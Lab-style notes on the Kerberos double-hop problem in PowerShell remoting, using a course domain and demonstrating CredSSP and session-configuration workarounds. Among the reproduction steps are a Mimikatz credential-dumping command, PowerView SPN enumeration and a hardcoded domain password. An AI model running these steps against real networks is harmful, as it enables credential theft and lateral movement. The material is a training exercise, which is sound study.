21.Kerberos Double Hop Problem

Overview

The Kerberos "Double Hop" problem occurs when a user authenticates to a remote system using Kerberos, but their credentials cannot be forwarded to a second system from that remote session. This is a common issue in scenarios involving WinRM, PowerShell remoting, and multi-tier authentication setups.

Scenario

A user attempts to connect from a local machine to DEV01 using PowerShell remoting. They then attempt to access a third system from DEV01, but authentication fails due to the Kerberos constraint.

Steps to Reproduce

1. Establish a WinRM Session to DEV01

   Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm

2. Change Directory

   cd 'C:\Users\Public\'

3. Run Mimikatz to View Credentials (Requires Privileged Access)

   .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

4. List Processes for a Specific User

   tasklist /V | findstr backupadm

5. Check Kerberos Ticket Cache

   klist

6. Import PowerView Module

   import-module .\PowerView.ps1

7. Enumerate Domain Users with SPNs

   get-domainuser -spn

8. Create a Secure Credential Object

   $SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
   $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

9. Query Domain Users with SPNs Using Credentials

   get-domainuser -spn -credential $Cred | select samaccountname

10. Register a New PSSession Configuration to Enable Credential Delegation

    Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential INLANEFREIGHT\backupadm

11. Restart WinRM Service

    Restart-Service WinRM

12. Enter PSSession Using the Registered Configuration

    Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess

Solution: CredSSP Authentication

To bypass the Kerberos double-hop issue, enable CredSSP Authentication, which allows credentials to be delegated securely.

Steps to Enable CredSSP

1. On the Client Machine

   Enable-WSManCredSSP -Role Client -DelegateComputer DEV01

2. On the Remote Server (DEV01)

   Enable-WSManCredSSP -Role Server

3. Run PowerShell Remoting with CredSSP

   Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -Authentication CredSSP

4. Verify CredSSP Configuration

   Get-WSManCredSSP

Alternative Solution: Kerberos Constrained Delegation (KCD)

Instead of using CredSSP, Kerberos Constrained Delegation (KCD) can be configured for more secure credential forwarding. This requires modifying Active Directory settings to allow a service account to delegate authentication to specific services.

Conclusion

The Kerberos "Double Hop" issue is a common obstacle in multi-hop authentication scenarios. Enabling CredSSP or configuring Kerberos Constrained Delegation can help mitigate this issue while maintaining security.